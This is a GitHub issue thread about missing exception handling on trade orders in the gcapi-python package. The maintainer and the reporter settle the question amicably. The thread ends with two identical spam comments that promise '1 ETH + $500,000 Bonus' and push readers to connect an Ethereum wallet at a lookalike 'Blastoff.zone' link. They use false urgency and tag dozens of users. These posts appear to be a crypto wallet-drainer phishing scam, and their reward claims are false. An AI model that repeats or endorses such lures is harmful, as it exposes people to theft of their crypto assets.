### ISSUE TITLE
No error catching on new orders

### ISSUE THREAD

**Issue by msbrewer** [rickykim93/gcapi-python#3]
There is no returning of errors in the response on trade orders.

**Comment by rickykim93** [comment]
There should be returning of errors. Could you tell me what you did so I can attempt to reproduce this error?

**Comment by msbrewer** [comment]
It returns the whole response yes but does not raise an exception in the
package.  It's not really an issue as I can raise exception within my app.

**Comment by msbrewer** [comment]
You know what on second look I might be mistaken.  Sorry about that.

**Comment by rickykim93** [comment]
ok no worries.

**Comment by avijit14** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
ndilsou, @R-K-H, @epikurus, @IronistM, @eesb99, @des137, @miguel104829, @iNN0CENTDEVIL, @lucindo, @Kayra-Baran, @claudiodcarvalho, @algopy, @danielamadori98, @TaiPham333, @WenchenLi, @peinan, @kejiashi, @Bahadoram, @96998, @JPANA108, @ZhaiCong, @oochooo, @naototachibana, @Baksonator, @mehul-quantfi, @ovyan, @adamekkic, @mudittiwari255, @yashkarbhari, @tolgayan, @x00b, @uxtechie, @mrizzben, @sk146, @AmolKalra, @christian-spooner, @playgrdstar, @TurboLuke, @natashawatkins, @MartinNiederl, @ntuieee, @Davi-X, @krisseo0202, @priyavratuniyal, @Mithileshraj123, @raulcarlomagno, @Bigg-Iron, @fanghao1024, @zhenmin-peng, @Chaseyway

**Comment by avijit14** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
awalpremi, @oguzakif, @lefig, @meteozay, @nagpach, @renanikeda, @Alessiobrini, @Garciolo, @JackGreenaway, @zhangyifei85, @Amanv24, @Finland93, @kuppu, @coolsnake, @victorcwai, @kehoecj, @LindbergGoes, @everbrez, @romellfudi, @BGasperov, @roywwei, @Tdhomas, @Sdoof, @charlesde-wind, @proxyanonymous, @sijichun, @shashankG26, @tokarev-i-v, @SingingOwl, @faerazo, @georgezouq, @jurajtrappl, @Hitoshi-Nakanishi, @RozHang1, @SaponinRacer, @vigneshmrajendran, @AntonioRossi, @TravisPruitt, @plpycoin, @ogczofqaul, @Hikikomori101, @drah-kah-ris, @batuan, @D-J-Wells, @uberdeveloper, @luigifilippochiara, @okg21, @froestiago, @ArpitJJain, @appfromape
